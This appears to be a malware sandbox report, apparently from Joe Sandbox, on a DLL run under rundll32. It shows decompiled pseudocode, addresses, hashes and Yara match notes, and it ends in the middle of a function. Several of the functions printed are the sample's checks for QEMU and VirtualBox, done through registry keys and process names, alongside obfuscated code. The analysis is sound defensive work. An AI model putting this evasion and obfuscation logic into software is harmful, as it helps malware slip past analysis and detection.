				 *((intOrPtr*)(_t458 + 0x238)) =  *((intOrPtr*)(_t458 + 0x238)) -  *((intOrPtr*)(_t582 + 0x130));
				 *((long long*)(_t582 + 0x130)) =  *((long long*)(_t582 + 0x130)) - 1;
				( *(_t582 + 0x468))[1] = _t458 + 0x65745c1d;
				 *( *(_t582 + 0x2a0) + 0x1c8) =  *( *(_t582 + 0x2a0) + 0xa0) * 0x12ad;
				 *( *(_t582 + 0x160) + 0x5d0) =  *( *(_t582 + 0x160) + 0x5d0) *  *( *(_t582 + 0x2a0) + 0x28);
				_t557 = _a24;
				r11d = _v84;
				r10d = _a24;
				r11d = r11d - 0xb13;
				r9d = _a16;
				r10d = r10d + 0xa39;
				r9d = r9d + r15d;
				r8d = _v76;
				 *( *(_t582 + 0x2a0) + 0x28) =  *( *(_t582 + 0x2a0) + 0x28) - 1;
				_t371 = _v68;
				r8d = r8d + 0x14c;
				_v104 = _t371;
				_v112 = r8d;
				_v120 = r9d;
				_v128 = r10d;
				_v136 = r11d;
				_v144 = _v84;
				_t160 = _t557 - 0x7f5; // 0x49d
				r9d = _t160;
				_v152 = _v84;
				E00007FFA7FFA535F84F0(_t321, _t323, _v84, _v76 - 0x391, _v64, _a24, _t582, _t582); // executed
				_v88 = _t371;
				( *(_t582 + 0x468))[1] =  *((intOrPtr*)( *(_t582 + 0x110) + 0x68)) + 0x6c56e2;
				 *((intOrPtr*)( *(_t582 + 0x240) + 0x4b8)) =  *((intOrPtr*)( *(_t582 + 0x240) + 0x4b8)) + ( *( *(_t582 + 0x20) + 0x140) ^ 0x00001355);
				_t375 =  *(_t582 + 0x240);
				 *( *(_t582 + 0x20) + 0x5d8) =  *( *(_t582 + 0x20) + 0x5d8) ^  *((intOrPtr*)(_t375 + 0x1b0)) + 0x0000145c;
				_t303 = LoadLibraryA(??);
				 *((long long*)(_t582 + 0x498)) = _t375;
				goto 0x535e1a2a;
				 *(_t582 + 0x330) =  *(_t582 + 0x330) ^ _t303;
				_v152 = _v80;
				CloseHandle(??);
				 *(_t582 + 0x240) =  *(_t582 + 0x240) + ( *(_t582 + 0xb0) & _v84 |  *(_t582 + 0x70));
				if (_v72 - _v76 + 0x5c5 <= 0) goto 0x535e1aae;
				r8d = _v84;
				r8d = r8d - 0x1b9;
				r11d = _v68;
				r10d = _a16;
				r11d = r11d - 0x55d;
				r10d = r10d + 0x11f1;
				_t388 = _v88 + 0x272;
				_v120 = _t388;
				_v128 = r10d;
				_v136 = r11d;
				_v144 = _a32 + 0x16ce;
				_v152 = _v68 - 0x82a;
				E00007FFA7FFA535F8F2C(_a32 + 0x16ce, _a32, _a24, _t559,  *(_t582 + 0x148), _t582);
				_v84 = _t388;
				_v76 = _v76 + 0xfffffff8;
				goto 0x535e1cee;
				if ( *(_t582 + 0x108) -  *(_t582 + 0x108) -  *((intOrPtr*)(_t582 + 0x310)) < 0) goto 0x535e1c64;
				if (_v68 - (_a32 &  *((intOrPtr*)(_t582 + 0x68)) - 0x00001b47) < 0) goto 0x535e1c13;
				_v88 = _v88 + ( *((intOrPtr*)(_t582 + 0x298)) -  *((intOrPtr*)(_t582 + 0x198)) &  *(_t582 + 0x3a0));
				_a32 = _v80 ^ _a32 ^ _v84 + _v88;
				_a24 = _a24 | _v84 *  *(_t582 + 0x3c8) + 0x0000145c;
				_v80 = _v80 * (_v76 & 0x00001320);
				_t402 = _a32 + _v76;
				 *(_t582 + 0xd8) =  *(_t582 + 0xd8) ^ _t402;
				_a16 = _a16 * (_a16 & ( *(_t582 + 0x250) |  *(_t582 + 0x110)));
				 *((intOrPtr*)(_t582 + 0x168)) =  *((intOrPtr*)(_t582 + 0x168)) - (_a16 +  *((intOrPtr*)(_t582 + 0x1b0))) * 0x157a;
				_a32 = _a32 + _t402 + r12d -  *((intOrPtr*)(_t582 + 0x178));
				r8d =  *(_t582 + 0x140);
				r8d = r8d - 0x145c;
				_t310 =  *((intOrPtr*)(_t582 + 0x130)) +  *((intOrPtr*)(_t582 + 0x298));
				LeaveCriticalSection(??);
				r15d = r15d - _t310;
				_t311 = _t310 + r15d;
				 *(_t582 + 0x88) =  *(_t582 + 0x88) * _t311;
				goto 0x535e1c64;
				r8d = _v72;
				r8d = r8d + _t311;
				r9d = _v88;
				_t312 = _t311 & r12d;
				r9d = r9d | _t312;
				r10d =  *(_t582 + 0x88);
				r10d = r10d | _t312;
				_v152 = r10d;
				DisconnectNamedPipe(??);
				if (_v68 != ( *(_t582 + 0x108) ^  *(_t582 + 0x2a8))) goto 0x535e1cee;
				if (_v68 == _v68 + (_v80 |  *(_t582 + 0x140))) goto 0x535e1cd5;
				r9d = r9d + 3;
				 *(_t582 + 0xd8) =  *(_t582 + 0xd8) *  *(_t582 + 0x148) *  *(_t582 + 0x3b8);
				if (r9d != _v68 + (_v80 |  *(_t582 + 0x140))) goto 0x535e1c96;
				r8d = r8d + 1;
				if (r8d == ( *(_t582 + 0x108) ^  *(_t582 + 0x2a8))) goto 0x535e1c7b;
				ExitProcess(??);
			}














































                0x7ffa535e1488
                0x7ffa535e14a2
                0x7ffa535e14b1
                0x7ffa535e14b5
                0x7ffa535e14bb
                0x7ffa535e14c3
                0x7ffa535e14ca
                0x7ffa535e14cf
                0x7ffa535e14e1
                0x7ffa535e14ec
                0x7ffa535e14ee
                0x7ffa535e14f5
                0x7ffa535e14fd
                0x7ffa535e1501
                0x7ffa535e1505
                0x7ffa535e1509
                0x7ffa535e1510
                0x7ffa535e1517
                0x7ffa535e151e
                0x7ffa535e1525
                0x7ffa535e152c
                0x7ffa535e1537
                0x7ffa535e153e
                0x7ffa535e1545
                0x7ffa535e1549
                0x7ffa535e1554
                0x7ffa535e155b
                0x7ffa535e1566
                0x7ffa535e156d
                0x7ffa535e1574
                0x7ffa535e1577
                0x7ffa535e157a
                0x7ffa535e157d
                0x7ffa535e1581
                0x7ffa535e1585
                0x7ffa535e158c
                0x7ffa535e158f
                0x7ffa535e15a4
                0x7ffa535e15b8
                0x7ffa535e15d6
                0x7ffa535e15e4
                0x7ffa535e1600
                0x7ffa535e1622
                0x7ffa535e1633
                0x7ffa535e163e
                0x7ffa535e164c
                0x7ffa535e1661
                0x7ffa535e1681
                0x7ffa535e169b
                0x7ffa535e16a5
                0x7ffa535e16af
                0x7ffa535e16b3
                0x7ffa535e16b6
                0x7ffa535e16ba
                0x7ffa535e16c2
                0x7ffa535e16c9
                0x7ffa535e16cc
                0x7ffa535e16dc
                0x7ffa535e16e2
                0x7ffa535e16e4
                0x7ffa535e16ea
                0x7ffa535e16ee
                0x7ffa535e16f8
                0x7ffa535e16fd
                0x7ffa535e1704
                0x7ffa535e1709
                0x7ffa535e1715
                0x7ffa535e1718
                0x7ffa535e1732
                0x7ffa535e1745
                0x7ffa535e1753
                0x7ffa535e175a
                0x7ffa535e1767
                0x7ffa535e1774
                0x7ffa535e177b
                0x7ffa535e1785
                0x7ffa535e1789
                0x7ffa535e1790
                0x7ffa535e1794
                0x7ffa535e179e
                0x7ffa535e17a5
                0x7ffa535e17aa
                0x7ffa535e17ae
                0x7ffa535e17b6
                0x7ffa535e17bb
                0x7ffa535e17c0
                0x7ffa535e17c4
                0x7ffa535e17c9
                0x7ffa535e17e6
                0x7ffa535e1800
                0x7ffa535e1823
                0x7ffa535e1841
                0x7ffa535e1844
                0x7ffa535e184f
                0x7ffa535e1856
                0x7ffa535e1871
                0x7ffa535e1886
                0x7ffa535e18a7
                0x7ffa535e18ba
                0x7ffa535e18c3
                0x7ffa535e18c7
                0x7ffa535e18cb
                0x7ffa535e18d2
                0x7ffa535e18d6
                0x7ffa535e18e4
                0x7ffa535e18e7
                0x7ffa535e18eb
                0x7ffa535e18f8
                0x7ffa535e18fb
                0x7ffa535e1902
                0x7ffa535e1906
                0x7ffa535e190b
                0x7ffa535e1910
                0x7ffa535e1915
                0x7ffa535e191a
                0x7ffa535e191e
                0x7ffa535e191e
                0x7ffa535e1925
                0x7ffa535e192c
                0x7ffa535e1931
                0x7ffa535e194b
                0x7ffa535e1967
                0x7ffa535e196e
                0x7ffa535e1987
                0x7ffa535e1995
                0x7ffa535e199c
                0x7ffa535e19a3
                0x7ffa535e19c7
                0x7ffa535e1a07
                0x7ffa535e1a0b
                0x7ffa535e1a23
                0x7ffa535e1a38
                0x7ffa535e1a46
                0x7ffa535e1a53
                0x7ffa535e1a63
                0x7ffa535e1a6d
                0x7ffa535e1a71
                0x7ffa535e1a7b
                0x7ffa535e1a82
                0x7ffa535e1a87
                0x7ffa535e1a8b
                0x7ffa535e1a90
                0x7ffa535e1a95
                0x7ffa535e1a99
                0x7ffa535e1a9d
                0x7ffa535e1aa2
                0x7ffa535e1aa5
                0x7ffa535e1aa9
                0x7ffa535e1ac2
                0x7ffa535e1ae1
                0x7ffa535e1b02
                0x7ffa535e1b17
                0x7ffa535e1b33
                0x7ffa535e1b4e
                0x7ffa535e1b5e
                0x7ffa535e1b70
                0x7ffa535e1b7e
                0x7ffa535e1b93
                0x7ffa535e1bb0
                0x7ffa535e1bc1
                0x7ffa535e1bd3
                0x7ffa535e1bda
                0x7ffa535e1bea
                0x7ffa535e1bf3
                0x7ffa535e1bf9
                0x7ffa535e1c0a
                0x7ffa535e1c11
                0x7ffa535e1c1d
                0x7ffa535e1c35
                0x7ffa535e1c3b
                0x7ffa535e1c3f
                0x7ffa535e1c49
                0x7ffa535e1c4f
                0x7ffa535e1c56
                0x7ffa535e1c59
                0x7ffa535e1c5e
                0x7ffa535e1c79
                0x7ffa535e1c94
                0x7ffa535e1c9d
                0x7ffa535e1cbc
                0x7ffa535e1cd3
                0x7ffa535e1cdc
                0x7ffa535e1cec
                0x7ffa535e1cf0

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: HeapProcess$AllocCloseCriticalExitHandleLeaveLibraryLoadSection
                • String ID:
                • API String ID: 1269075160-0
                • Opcode ID: 4b38d50d65ddf06cecd7d8751ab8fe2c6599f940d285598a8d05519128601b9e
                • Instruction ID: d47ff28244b39d2eb5a565c67a9f8f57efc8ec61dd40c4b8f80ae60d5faafcb5
                • Opcode Fuzzy Hash: 4b38d50d65ddf06cecd7d8751ab8fe2c6599f940d285598a8d05519128601b9e
                • Instruction Fuzzy Hash: 1F3206B2A10A908AEB54CF69E898BAD37B9F78878CF054526DF4D97B54CF38D550CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CECF0 Relevance: 7.6, Strings: 6, Instructions: 51COMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E00000215215205CECF0(void* __eflags, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				void* _v8;
				signed int _v24;
				char _v536;
				long long _v544;
				long long _v552;
				long long _v560;
				long long _v568;
				long long _v576;
				char _v584;
				void* __rdi;
				void* _t21;
				void* _t25;
				void* _t28;
				void* _t29;
				signed long long _t34;
				long long _t43;
				void* _t50;
				void* _t55;
				void* _t58;

				_a8 = __rbx;
				_a16 = __rsi;
				_t56 = _t55 - 0x260;
				_t34 =  *0x2067c720; // 0xca1645d940e
				_v24 = _t34 ^ _t55 - 0x00000260;
				_v584 = L"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0";
				_t43 = L"QEMU";
				_v568 = _t43;
				_v576 = L"Identifier";
				_t52 =  &_v584;
				_v544 = _t43;
				_v560 = L"HARDWARE\\Description\\System";
				_v552 = L"SystemBiosVersion";
				r8d = 0x200;
				E00000215215205F8EF0(_t25, 0, _t28, _t29,  &_v536, __rdx, _t50, _t58);
				E00000215215205CD1D0(_t25, L"SystemBiosVersion",  &_v536, __rdx, L"Checking reg key %s ", _v584);
				_t21 = E00000215215205D0130( *_t52,  *((intOrPtr*)(_t52 + 8)),  *((intOrPtr*)(_t52 + 0x10))); // executed
				if (_t21 != 0) goto 0x205cedae;
				if (__rbx + 1 - 2 < 0) goto 0x205ced60;
				goto 0x205cedb3;
				return E00000215215205F59D0(_t25, _v24 ^ _t56,  *_t52,  *((intOrPtr*)(_t52 + 0x10)));
			}






















                0x215205cecf0
                0x215205cecf5
                0x215205cecfb
                0x215205ced02
                0x215205ced0c
                0x215205ced1d
                0x215205ced22
                0x215205ced30
                0x215205ced35
                0x215205ced3a
                0x215205ced46
                0x215205ced4b
                0x215205ced57
                0x215205ced67
                0x215205ced6d
                0x215205ced86
                0x215205ced96
                0x215205ced9d
                0x215205cedaa
                0x215205cedac
                0x215205cedd7

                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID: Checking reg key %s $HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0$HARDWARE\Description\System$Identifier$QEMU$SystemBiosVersion
                • API String ID: 3677997916-3557842602
                • Opcode ID: ef5c11d568b48eaa05c331fdbd5ffc010a52dfb12a58093da07c85f3f1e3875e
                • Instruction ID: 118adc403df565f1c7f95571d3f0504a34e0d169b9b87801d30faf60c63272d8
                • Opcode Fuzzy Hash: ef5c11d568b48eaa05c331fdbd5ffc010a52dfb12a58093da07c85f3f1e3875e
                • Instruction Fuzzy Hash: 4921393720AFA0D1EA708B01F4882CAB3A4FBD9754F904166EE8E43B59DF78D545C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CEDE0 Relevance: 5.0, Strings: 4, Instructions: 40COMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E00000215215205CEDE0(void* __eflags, signed int __rbx, long long _a8) {
				signed int _v24;
				char _v536;
				long long _v552;
				long long _v560;
				long long _v568;
				void* __rdi;
				void* _t15;
				void* _t19;
				void* _t22;
				void* _t23;
				signed long long _t28;
				signed int _t33;
				void* _t41;
				void* _t42;
				void* _t44;
				signed long long _t45;
				void* _t47;

				_t33 = __rbx;
				_a8 = __rbx;
				_t45 = _t44 - 0x250;
				_t28 =  *0x2067c720; // 0xca1645d940e
				_v24 = _t28 ^ _t45;
				_v568 = L"qemu-ga.exe";
				_v560 = L"vdagent.exe";
				_v552 = L"vdservice.exe";
				asm("o16 nop [eax+eax]");
				r8d = 0x200;
				E00000215215205F8EF0(_t19, 0, _t22, _t23,  &_v536, _t41, _t42, _t47);
				_t43 =  *((intOrPtr*)(_t45 + 0x20 + __rbx * 8));
				_t49 =  *((intOrPtr*)(_t45 + 0x20 + __rbx * 8));
				E00000215215205CD1D0(_t19, L"vdservice.exe",  &_v536, _t41, L"Checking qemu processes %s ",  *((intOrPtr*)(_t45 + 0x20 + __rbx * 8)));
				_t15 = E00000215215205D0330(_t22, _t23, __rbx, _t43); // executed
				if (_t15 != 0) goto 0x205cee77;
				if (_t33 + 1 - 3 < 0) goto 0x205cee30;
				goto 0x205cee7c;
				return E00000215215205F59D0(_t19, _v24 ^ _t45, _t41, _t49);
			}




















                0x215205cede0
                0x215205cede0
                0x215205cede6
                0x215205ceded
                0x215205cedf7
                0x215205cee08
                0x215205cee14
                0x215205cee20
                0x215205cee25
                0x215205cee37
                0x215205cee3d
                0x215205cee42
                0x215205cee4e
                0x215205cee5b
                0x215205cee63
                0x215205cee6a
                0x215205cee73
                0x215205cee75
                0x215205cee9c

                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                • String ID: Checking qemu processes %s $qemu-ga.exe$vdagent.exe$vdservice.exe
                • API String ID: 1083639309-928502638
                • Opcode ID: 6fa0968a4e5622fb480b1ec55f295f6686cf1391d64602b95252d623bc6beb0a
                • Instruction ID: 6edcd63e0d1c3ef68a2eff38c31c5fe1bcf4f374c92ee4cb936de88ecc693959
                • Opcode Fuzzy Hash: 6fa0968a4e5622fb480b1ec55f295f6686cf1391d64602b95252d623bc6beb0a
                • Instruction Fuzzy Hash: F411233330AE94C1EB209B11E4983EA72A5FFE9784F645166DE8D56B69EA38C1418B40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CDA30 Relevance: 3.8, Strings: 3, Instructions: 38COMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E00000215215205CDA30(void* __eflags, signed int __rbx, long long _a8) {
				signed int _v24;
				char _v536;
				long long _v544;
				long long _v552;
				void* __rdi;
				void* _t14;
				void* _t18;
				void* _t21;
				void* _t22;
				signed long long _t27;
				signed int _t31;
				void* _t39;
				void* _t40;
				void* _t42;
				signed long long _t43;
				void* _t45;

				_t31 = __rbx;
				_a8 = __rbx;
				_t43 = _t42 - 0x240;
				_t27 =  *0x2067c720; // 0xca1645d940e
				_v24 = _t27 ^ _t43;
				_v552 = L"vboxservice.exe";
				_v544 = L"vboxtray.exe";
				r8d = 0x200;
				E00000215215205F8EF0(_t18, 0, _t21, _t22,  &_v536, _t39, _t40, _t45);
				_t41 =  *((intOrPtr*)(_t43 + 0x20 + __rbx * 8));
				_t47 =  *((intOrPtr*)(_t43 + 0x20 + __rbx * 8));
				E00000215215205CD1D0(_t18, L"vboxtray.exe",  &_v536, _t39, L"Checking VirtualBox process %s ",  *((intOrPtr*)(_t43 + 0x20 + __rbx * 8)));
				_t14 = E00000215215205D0330(_t21, _t22, __rbx, _t41); // executed
				if (_t14 != 0) goto 0x205cdab7;
				if (_t31 + 1 - 2 < 0) goto 0x205cda70;
				goto 0x205cdabc;
				return E00000215215205F59D0(_t18, _v24 ^ _t43, _t39, _t47);
			}



















                0x215205cda30
                0x215205cda30
                0x215205cda36
                0x215205cda3d
                0x215205cda47
                0x215205cda58
                0x215205cda64
                0x215205cda77
                0x215205cda7d
                0x215205cda82
                0x215205cda8e
                0x215205cda9b
                0x215205cdaa3
                0x215205cdaaa
                0x215205cdab3
                0x215205cdab5
                0x215205cdadc

                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                • String ID: Checking VirtualBox process %s $vboxservice.exe$vboxtray.exe
                • API String ID: 1083639309-2201811630
                • Opcode ID: ee22ddd8c7f7173a42e2b600fdab4cb59b01073175a9ea6accbe5592d33e00c8
                • Instruction ID: 5ab1e3796fb15a78053c41e5d771705c51a9de2d4dc584aded5404cf7e10bf4d
                • Opcode Fuzzy Hash: ee22ddd8c7f7173a42e2b600fdab4cb59b01073175a9ea6accbe5592d33e00c8
                • Instruction Fuzzy Hash: 6201693331AE90C1EB209B11F4993EA63A0FBE8794F5411669E8A47B59DB3CC141CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F7A40 Relevance: 3.5, APIs: 2, Instructions: 511pipeCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 59%
                			E00007FFA7FFA535F7A40(long long __rbx, signed long long __rcx, signed int __rdx, void* __r8, void* __r9, signed long long __r11) {
				void* __rsi;
				void* __rbp;
				signed int _t414;
				intOrPtr* _t419;
				signed int _t423;
				int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed int _t447;
				signed int _t449;
				intOrPtr _t453;
				void* _t455;
				intOrPtr _t459;
				void* _t461;
				signed int _t468;
				long long _t469;
				intOrPtr* _t485;
				intOrPtr _t494;
				intOrPtr _t517;
				intOrPtr* _t519;
				intOrPtr* _t521;
				intOrPtr* _t522;
				signed long long _t532;
				signed long long _t533;
				signed long long _t560;
				signed int _t565;
				signed int _t580;
				signed long long _t584;
				signed int* _t625;
				signed int _t647;
				signed long long _t655;
				intOrPtr _t681;
				signed int _t682;
				signed int _t683;
				signed int _t691;
				signed long long _t702;
				intOrPtr _t710;
				signed long long _t713;
				long long _t716;
				void* _t723;
				void* _t724;
				intOrPtr _t727;
				intOrPtr _t729;
				void* _t740;
				signed long long _t744;
				void* _t745;
				signed long long _t747;
				void* _t749;
				void* _t751;

				_t744 = __r11;
				_t726 = __r8;
				 *((long long*)(_t723 + 0x10)) = __rbx;
				_push(_t716);
				_t724 = _t723 - 0x70;
				r14d =  *(_t724 + 0xd0);
				r15d =  *(_t724 + 0xe8);
				_t5 = _t726 - 0x96b; // -1859
				_t449 = _t5;
				r12d = __r9 - 0x1556;
				r9d = r9d + 0xfffff9c2;
				 *(_t724 + 0xc0) = _t468;
				r15d = r15d + 0xfec;
				 *(_t724 + 0xb0) = r9d;
				_t580 =  *((intOrPtr*)(_t724 + 0xd8)) + 0x7b;
				 *((long long*)(_t724 + 0x50)) = _t716;
				 *(_t724 + 0xd0) = _t580;
				r14d = r14d + 0xffffece0;
				_t13 = _t716 + 0xfe4; // 0x8a1
				_t469 = _t13;
				r8d = r15d;
				_t713 = __rcx - 0xf3;
				if (__rdx - _t469 >= 0) goto 0x535f8158;
				r10d = _t580 - 0x83;
				 *((long long*)(_t724 + 0x48)) = _t469;
				r11d = _t713 + 0x7ef;
				 *(_t724 + 0x40) = r10d;
				 *(_t724 + 0x38) = __rdx;
				 *(_t724 + 0x30) = r11d;
				_t25 = _t716 + 0x1482; // 0xd3f
				r9d = _t25;
				 *(_t724 + 0x28) = _t713 - 0x8cc;
				r8d = _t751 - 0x62d;
				 *(_t724 + 0x20) = __rcx;
				_t414 = E00007FFA7FFA535F8C00(_t713 - 0x8cc, __rcx,  *(_t724 + 0xb0) + 0x56e, _t713, _t716, __r8, __r9, _t740, _t751, _t749, _t747, _t745);
				 *((long long*)(__rdx + 0x61c)) = 6;
				r9d = _t449;
				r13d = 0x1582;
				r14d = 0x8000001f;
				 *( *((intOrPtr*)(__rdx + 0x20)) + 0x128) =  *( *((intOrPtr*)(__rdx + 0x20)) + 0x128) ^  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x5e8)) + 0x298)) - 0x00000c92;
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4)) +  *((intOrPtr*)(__rdx + 0x610));
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4)) +  *((intOrPtr*)(__rdx + 0x614));
				if ( *((intOrPtr*)(__rdx + 0x600)) <= 0) goto 0x535f7dca;
				r10d = _t449;
				 *(__rdx + 0x3c8) =  *(__rdx + 0x130) | _t747;
				 *((intOrPtr*)(__rdx + 0x2f8)) =  *((intOrPtr*)(__rdx + 0x2f8)) - ( *( *((intOrPtr*)(__rdx + 0x240)) + 0x5d0) ^ 0x000011f1);
				 *((long long*)( *((intOrPtr*)(__rdx + 0x110)) + 8)) = 0x2fce;
				_t453 =  *((intOrPtr*)(__rdx + 0x604));
				if (_t453 <= 0) goto 0x535f7d4d;
				 *((long long*)( *((intOrPtr*)(__rdx + 0x358)) + 0x2f8)) =  *((intOrPtr*)(__rdx + 0x298));
				 *((long long*)(__rdx + 0x298)) =  *((long long*)(__rdx + 0x298)) - 1;
				 *(__rdx + 0x128) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x110)) + 0x250)) - 0x1515;
				_t727 =  *((intOrPtr*)(__rdx + 0x430));
				_t433 =  *(_t727 +  *(__rdx + 0x60c) * 4);
				 *(_t727 +  *(__rdx + 0x608) * 4) =  *(_t727 +  *(__rdx + 0x608) * 4) ^ _t433;
				if (_t453 >= 0) goto 0x535f7c5a;
				_t681 =  *((intOrPtr*)(__rdx + 0x430));
				r8d =  *(_t681 +  *(__rdx + 0x608) * 4);
				if (( *((intOrPtr*)(__rdx + 0x61c)) - 1 | 0xffffffe0) + 1 == 0) goto 0x535f7c73;
				asm("inc ecx");
				r10d = r10d + _t431;
				 *((intOrPtr*)(_t681 +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)(_t681 +  *(__rdx + 0x60c) * 4)) + r8d;
				_t682 =  *((intOrPtr*)(__rdx + 0x110));
				 *(_t682 + 0x410) =  *(_t682 + 0x410) |  *( *((intOrPtr*)(__rdx + 0x358)) + 0x128);
				 *( *((intOrPtr*)(__rdx + 0x358)) + 0x128) =  *( *((intOrPtr*)(__rdx + 0x358)) + 0x128) - 1;
				_t485 =  *((intOrPtr*)(__rdx + 0x108));
				 *(_t485 + 0x330) =  *( *((intOrPtr*)(__rdx + 0x20)) + 0x138) ^ 0x00001355;
				 *_t485 =  *_t485 + _t414;
				asm("cdq");
				 *(__rdx + 0x608) = _t682;
				_t683 =  *((intOrPtr*)(__rdx + 0x358));
				 *((intOrPtr*)(_t683 + 0x5d0)) =  *((intOrPtr*)(_t683 + 0x5d0)) + 0x16ce -  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x5e8)) + 0x440));
				asm("cdq");
				 *(__rdx + 0x60c) = _t683;
				 *((long long*)( *((intOrPtr*)(__rdx + 0x110)) + 0x390)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x160)) + 0x248));
				 *((long long*)( *((intOrPtr*)(__rdx + 0x160)) + 0x248)) =  *((long long*)( *((intOrPtr*)(__rdx + 0x160)) + 0x248)) - 1;
				_t455 = r10d -  *((intOrPtr*)(__rdx + 0x604));
				if (_t455 < 0) goto 0x535f7bf3;
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x608) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x608) * 4)) + (_t433 & r14d);
				if (_t455 >= 0) goto 0x535f7d82;
				_t494 =  *((intOrPtr*)(__rdx + 0x430));
				if (( *((intOrPtr*)(__rdx + 0x618)) - 1 | 0xffffffe0) + 1 == 0) goto 0x535f7d9d;
				r8d =  *(_t494 +  *(__rdx + 0x608) * 4);
				asm("inc ecx");
				goto 0x535f7da8;
				r8d =  *(_t494 +  *(__rdx + 0x608) * 4);
				r9d = r9d + _t431;
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x60c) * 4)) + r8d;
				if (r9d -  *((intOrPtr*)(__rdx + 0x600)) < 0) goto 0x535f7ba8;
				 *((long long*)(__rdx + 0x600)) = 0x3b610b;
				r9d = _t449;
				 *(__rdx + 0x608) = 7;
				r11d = 0x1b47;
				 *(__rdx + 0x60c) = 4;
				 *((long long*)(__rdx + 0x610)) = 0xf6da;
				 *((long long*)(__rdx + 0x614)) = 0x18551;
				 *((long long*)(__rdx + 0x604)) = 0xe5;
				 *((long long*)(__rdx + 0x618)) = 8;
				 *( *((intOrPtr*)(__rdx + 0x108)) + 0x4b8) =  *( *((intOrPtr*)(__rdx + 0x108)) + 0x4b8) ^ 0x000010ae;
				 *((long long*)(__rdx + 0x61c)) = 0xb;
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4)) +  *((intOrPtr*)(__rdx + 0x610));
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4)) +  *((intOrPtr*)(__rdx + 0x614));
				 *( *((intOrPtr*)(__rdx + 0x240)) + 0x310) =  *( *((intOrPtr*)(__rdx + 0x240)) + 0x310) ^ ( *( *((intOrPtr*)(__rdx + 0x20)) + 0x128) | _t747);
				if ( *((intOrPtr*)(__rdx + 0x600)) <= 0) goto 0x535f804d;
				r10d = _t449;
				 *((long long*)( *((intOrPtr*)(__rdx + 0x160)) + 0x128)) = 0x1b3e5bc;
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x160)) + 0x90)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x160)) + 0x90)) +  *( *((intOrPtr*)(__rdx + 0x358)) + 0x128) - 0x1ba7;
				_t459 =  *((intOrPtr*)(__rdx + 0x604));
				if (_t459 <= 0) goto 0x535f7fb1;
				_t729 =  *((intOrPtr*)(__rdx + 0x430));
				_t436 =  *(_t729 +  *(__rdx + 0x60c) * 4);
